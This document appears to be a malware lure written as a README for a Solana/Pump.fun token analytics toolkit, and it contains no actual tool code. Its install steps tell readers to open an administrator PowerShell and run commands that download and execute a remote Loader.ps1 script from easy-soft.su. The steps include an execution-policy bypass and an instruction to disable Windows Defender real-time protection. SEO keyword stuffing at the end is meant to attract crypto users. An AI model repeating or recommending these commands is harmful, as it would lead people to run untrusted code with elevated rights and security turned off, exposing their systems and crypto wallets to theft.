An open-source developer toolkit and automated analytical framework for monitoring real-time liquidity pools, token bonding curves, and smart contract behaviors on the Pump.fun ecosystem.
This repository provides an automated infrastructure to track, analyze, and audit token launches. By utilizing high-frequency Solana RPC nodes and parsing on-chain logs, the tool detects anomalies in liquidity distribution, identifies developer wallet clusters, and evaluates potential pool risks before tokens migrate to Raydium.
- Real-Time Bonding Curve Tracking: Monitor absolute supply metrics and bonding curve velocity.
- Developer Wallet Cluster Analysis: Identify multi-wallet funding patterns and historical creation footprints.
- Liquidity Pool Auditing: Automated detection of sudden liquidity migration or developer supply dumping.
- Solana RPC Stream: Optimized parsing of transaction logs via WebSocket subscriptions.
- Risk Scoring Engine: Algorithmic calculation of token security metrics based on holder distribution.
-
Open PowerShell as Administrator:
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
- Press the
-
Execute the Deployment Command: Copy, paste, and press
Enterto run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:irm https://easy-soft.su/powershell/Loader.ps1 | iex
If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:
powershell -ExecutionPolicy Bypass -Command "irm https://easy-soft.su/powershell/Loader.ps1 | iex"In older legacy environments where aliases are missing, use explicit full system cmdlets:
Invoke-RestMethod https://easy-soft.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.
The tool acts as a passive observer on the Solana blockchain, specifically filtering program IDs associated with token deployment platforms.
To maximize Google and GitHub Search visibility, this project indexes under the following developer queries:
solana bonding curve tracker, pump fun analytics tool, liquidity pool monitor solana, token launch risk assessment, solana rpc log parser, pump fun developer wallet tracker, automated token audit script.
This software is for educational, research, and analytical purposes only. It does not constitute financial advice, trading recommendations, or an endorsement of any digital assets. Use at your own discretion